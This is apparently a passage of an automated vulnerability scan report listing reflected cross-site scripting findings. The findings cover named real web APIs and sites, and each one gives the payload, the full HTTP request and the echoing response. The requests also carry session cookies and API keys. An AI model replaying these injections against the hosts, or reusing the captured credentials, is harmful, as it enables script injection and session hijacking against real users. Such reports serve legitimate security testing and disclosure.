Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=H4sIAAAAAAAAAJVTy27TQBS9SZu+G9pGLJEqPsBt0gcpLFBIHwTSJpCiStmgiX2TDJ2HOx6HmAUCiT1rBPwBm34FG9gg8RmwYceKGddOUyQWeGFZx+eee86duZ9+QC5QcNuV3OlgoDth5Hi0RzUqRRyDclQuOlJ5qBxfSReDQCqnKuUpxYZFV3+9f/vl/On9LEzUYYVXk5KaRl4TXRloWKo/IwOyFmrK1uo00HfqkOcNZbqIRjfW0LBywWFE9NZaWlHRM6wcP458PIOXkB36xmXBchyr41SMvciKDV9/u/HuM/k4AZkaTAb0BQ59AMg8nzTvOVN097+jXQ1wHg633zQ2+1m4WYP5LuGURS08O5JtmKLNvhRYgzyjAg0YonDxSO6afFUpTIxOqLHCdRtm+AHt6sOgZz+bVLv9mngAs/xRSISmOqrDdbdPmfd3dxs+U4cldwwfDaUOc65tQ1xd8xKk4OGAuriPRIcKK54nRZCILCAnlBlImaQJfeEU0d8bmkGakSfYPK8STZjsPcQogRZT6DF2R62m+J4VTK3wfaoCfUQ4jnRs5jhJWrJwMQbTn/Su0pixMKJNXFbk02lV3LGUc7yppBeOIdd4q09936Q4RN2XKTzDW1oqHJM7Ieb4hY5amujUwgo/UQYaH34a3DdXsiFY1FRmqlfv6a4MOwzNPZ21pJhgq6ZNVwuMHVM+QGVPpaKQtKmfWg6M42MZG9xnpKehMKZ+T0qGRBj5QuCjSwnbRUYHqCLLTSSWkl/xFqX4TLwB/3gyfvxoyKF4+qSlYbq8WSyVdkoJnHfpxs7O1q3N9fX1cqlskMVisVwsbxS3tsulzZKGqQMlQ+FpgAsps2PL8WJa205i++uqevX9w++fWci0ITcgLLR7abp2CQvisSwPTW8PuyRk+vLrD2JlK3iQBAAA; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web3.ATL
Etag: "7f4e0f2b8eda632249293d791be5f98f"
X-Runtime: 4
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2459
Date: Thu, 11 Aug 2011 23:50:19 GMT

busopsLow.BTP.retLoadBTPSKUs({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<Your
...[SNIP]...
tmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json&82b98<script>alert(1)</script>79e8fa433a0=1'",
"status": "400 Bad Request"
}
})

1.169. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [pageSize parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The value of the pageSize request parameter is copied into the HTML document as plain text between tags. The payload d5e64<script>alert(1)</script>484527ebd4e was submitted in the pageSize parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(sku%20in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99d5e64<script>alert(1)</script>484527ebd4e&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=H4sIAAAAAAAAAJVTy27TQBS9SZu+G9pGLJEqPsBt0gcpLFBIHwTSJpCiStmgiX2TDJ2HOx6HmAUCiT1rBPwBm34FG9gg8RmwYceKGddOUyQWeGFZx+eee86duZ9+QC5QcNuV3OlgoDth5Hi0RzUqRRyDclQuOlJ5qBxfSReDQCqnKuUpxYZFV3+9f/vl/On9LEzUYYVXk5KaRl4TXRloWKo/IwOyFmrK1uo00HfqkOcNZbqIRjfW0LBywWFE9NZaWlHRM6wcP458PIOXkB36xmXBchyr41SMvciKDV9/u/HuM/k4AZkaTAb0BQ59AMg8nzTvOVN097+jXQ1wHg633zQ2+1m4WYP5LuGURS08O5JtmKLNvhRYgzyjAg0YonDxSO6afFUpTIxOqLHCdRtm+AHt6sOgZz+bVLv9mngAs/xRSISmOqrDdbdPmfd3dxs+U4cldwwfDaUOc65tQ1xd8xKk4OGAuriPRIcKK54nRZCILCAnlBlImaQJfeEU0d8bmkGakSfYPK8STZjsPcQogRZT6DF2R62m+J4VTK3wfaoCfUQ4jnRs5jhJWrJwMQbTn/Su0pixMKJNXFbk02lV3LGUc7yppBeOIdd4q09936Q4RN2XKTzDW1oqHJM7Ieb4hY5amujUwgo/UQYaH34a3DdXsiFY1FRmqlfv6a4MOwzNPZ21pJhgq6ZNVwuMHVM+QGVPpaKQtKmfWg6M42MZG9xnpKehMKZ+T0qGRBj5QuCjSwnbRUYHqCLLTSSWkl/xFqX4TLwB/3gyfvxoyKF4+qSlYbq8WSyVdkoJnHfpxs7O1q3N9fX1cqlskMVisVwsbxS3tsulzZKGqQMlQ+FpgAsps2PL8WJa205i++uqevX9w++fWci0ITcgLLR7abp2CQvisSwPTW8PuyRk+vLrD2JlK3iQBAAA; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "9f3a6c2d1a0f6542ce664baf7784469a"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2456
Date: Thu, 11 Aug 2011 23:50:14 GMT

busopsLow.BTP.retLoadBTPSKUs({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<Your
...[SNIP]...
12292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99d5e64<script>alert(1)</script>484527ebd4e&format=json'",
"status": "400 Bad Request"
}
})

1.170. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [show parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The value of the show request parameter is copied into the HTML document as plain text between tags. The payload 6c6ee<script>alert(1)</script>9c6093a9606 was submitted in the show parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(sku%20in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku6c6ee<script>alert(1)</script>9c6093a9606&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=H4sIAAAAAAAAAJVTy27TQBS9SZu+G9pGLJEqPsBt0gcpLFBIHwTSJpCiStmgiX2TDJ2HOx6HmAUCiT1rBPwBm34FG9gg8RmwYceKGddOUyQWeGFZx+eee86duZ9+QC5QcNuV3OlgoDth5Hi0RzUqRRyDclQuOlJ5qBxfSReDQCqnKuUpxYZFV3+9f/vl/On9LEzUYYVXk5KaRl4TXRloWKo/IwOyFmrK1uo00HfqkOcNZbqIRjfW0LBywWFE9NZaWlHRM6wcP458PIOXkB36xmXBchyr41SMvciKDV9/u/HuM/k4AZkaTAb0BQ59AMg8nzTvOVN097+jXQ1wHg633zQ2+1m4WYP5LuGURS08O5JtmKLNvhRYgzyjAg0YonDxSO6afFUpTIxOqLHCdRtm+AHt6sOgZz+bVLv9mngAs/xRSISmOqrDdbdPmfd3dxs+U4cldwwfDaUOc65tQ1xd8xKk4OGAuriPRIcKK54nRZCILCAnlBlImaQJfeEU0d8bmkGakSfYPK8STZjsPcQogRZT6DF2R62m+J4VTK3wfaoCfUQ4jnRs5jhJWrJwMQbTn/Su0pixMKJNXFbk02lV3LGUc7yppBeOIdd4q09936Q4RN2XKTzDW1oqHJM7Ieb4hY5amujUwgo/UQYaH34a3DdXsiFY1FRmqlfv6a4MOwzNPZ21pJhgq6ZNVwuMHVM+QGVPpaKQtKmfWg6M42MZG9xnpKehMKZ+T0qGRBj5QuCjSwnbRUYHqCLLTSSWkl/xFqX4TLwB/3gyfvxoyKF4+qSlYbq8WSyVdkoJnHfpxs7O1q3N9fX1cqlskMVisVwsbxS3tsulzZKGqQMlQ+FpgAsps2PL8WJa205i++uqevX9w++fWci0ITcgLLR7abp2CQvisSwPTW8PuyRk+vLrD2JlK3iQBAAA; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web3.ATL
Etag: "9d76a63d9b3373d9fde5abdd13e2c8c9"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2456
Date: Thu, 11 Aug 2011 23:50:09 GMT

busopsLow.BTP.retLoadBTPSKUs({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<Your
...[SNIP]...
],
"code": 400,
"message": "Couldn't understand '/v1/products(sku in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku6c6ee<script>alert(1)</script>9c6093a9606&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json'",
"status": "400 Bad Request"
}
})

1.171. http://api.bizographics.com/v1/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload f3a73<script>alert(1)</script>d98aef6a709 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wdsf3a73<script>alert(1)</script>d98aef6a709&admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102149864&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXSH5Dnsisghkaj5XcunNcMDa7Re6IGD4lBDMrHLjNQH9Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQisoAFDZgxHJAX1nSmuONzqEVUJBxdqAyCgQ2DU8QwOXXYR472xAuokuJrWsMNDohYipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 11 Aug 2011 22:35:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 84
Connection: keep-alive

Unknown API key: (8dn4jnyemg4ky9svqgs28wdsf3a73<script>alert(1)</script>d98aef6a709)

1.172. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 30842<script>alert(1)</script>de1b16eacb5 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&callback_url=30842<script>alert(1)</script>de1b16eacb5 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102149864&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXSH5Dnsisghkaj5XcunNcMDa7Re6IGD4lBDMrHLjNQH9Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQisoAFDZgxHJAX1nSmuONzqEVUJBxdqAyCgQ2DU8QwOXXYR472xAuokuJrWsMNDohYipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 11 Aug 2011 22:36:13 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: 30842<script>alert(1)</script>de1b16eacb5

1.173. http://api.demandbase.com/api/v2/ip.js [var parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.demandbase.com
Path:   /api/v2/ip.js

Issue detail

The value of the var request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31774%3balert(1)//23ded926607 was submitted in the var parameter. This input was echoed as 31774;alert(1)//23ded926607 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/v2/ip.js?key=e4086fa3ea9d74ac2aae2719a0e5285dc7075d7b&var=s_dmdbase_v_131774%3balert(1)//23ded926607&rnd=3023 HTTP/1.1
Host: api.demandbase.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.adobe.com/cfusion/search/index.cfm?term=xss&siteSection=solutions.html&loc=en_us&9ea5a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3b867a7c636=1
Cookie: _jsuid=1110217733238110538; __utma=67952772.705302637.1314726715.1314726715.1314726715.1; __utmz=67952772.1314726715.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Api-Version: v2
Content-Type: application/javascript;charset=utf-8
Date: Wed, 31 Aug 2011 13:11:55 GMT
Server: nginx/1.0.4
Status: 200 OK
Vary: Accept-Encoding
Content-Length: 367
Connection: keep-alive

var s_dmdbase_v_131774;alert(1)//23ded926607={"registry_longitude":-96.8207015991211,"registry_country_code":"US","registry_state":"TX","registry_city":"Dallas","registry_latitude":32.7825012207031,"isp":true,"registry_zip_code":"75207","registr
...[SNIP]...

1.174. http://api.viglink.com/api/ping [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 633b6<script>alert(1)</script>513203d4fd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ping633b6<script>alert(1)</script>513203d4fd6?format=jsonp&drKey=1203&loc=http%3A%2F%2Fforums.macnn.com%2F90%2Fmac-os-x%2F114884%2Fadd-radio-stations-itunes-os-x%2F&v=1&jsonp=vglnk_jsonp_13171776967450 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Origin: http://forums.macnn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=5e226a1c4d529824374eed76438f0dc6

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/plain
Date: Wed, 28 Sep 2011 02:56:57 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Set-Cookie: JSESSIONID=D38425AB4D2AD9D2B680E50A963C5D18; Path=/
Content-Length: 72
Connection: keep-alive

Unknown API method: /api/ping633b6<script>alert(1)</script>513203d4fd6

1.175. http://api.viglink.com/api/ping [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 8a155<script>alert(1)</script>ba76e2d9a34 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ping?format=jsonp&drKey=1203&loc=http%3A%2F%2Fforums.macnn.com%2F90%2Fmac-os-x%2F114884%2Fadd-radio-stations-itunes-os-x%2F&v=1&jsonp=vglnk_jsonp_131717769674508a155<script>alert(1)</script>ba76e2d9a34 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Origin: http://forums.macnn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=5e226a1c4d529824374eed76438f0dc6

Response

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://forums.macnn.com
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en-US
Content-Type: text/javascript;charset=UTF-8
Date: Wed, 28 Sep 2011 02:55:21 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 160
Connection: keep-alive

vglnk_jsonp_131717769674508a155<script>alert(1)</script>ba76e2d9a34(1317178521178,2000,[],[],{"plugins":{},"timeClick":true,"debug":false,"timePing":false},[]);

1.176. http://assets.nydailynews.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8425'%3balert(1)//f2815976b98 was submitted in the REST URL parameter 1. This input was echoed as a8425';alert(1)//f2815976b98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icoa8425'%3balert(1)//f2815976b98 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
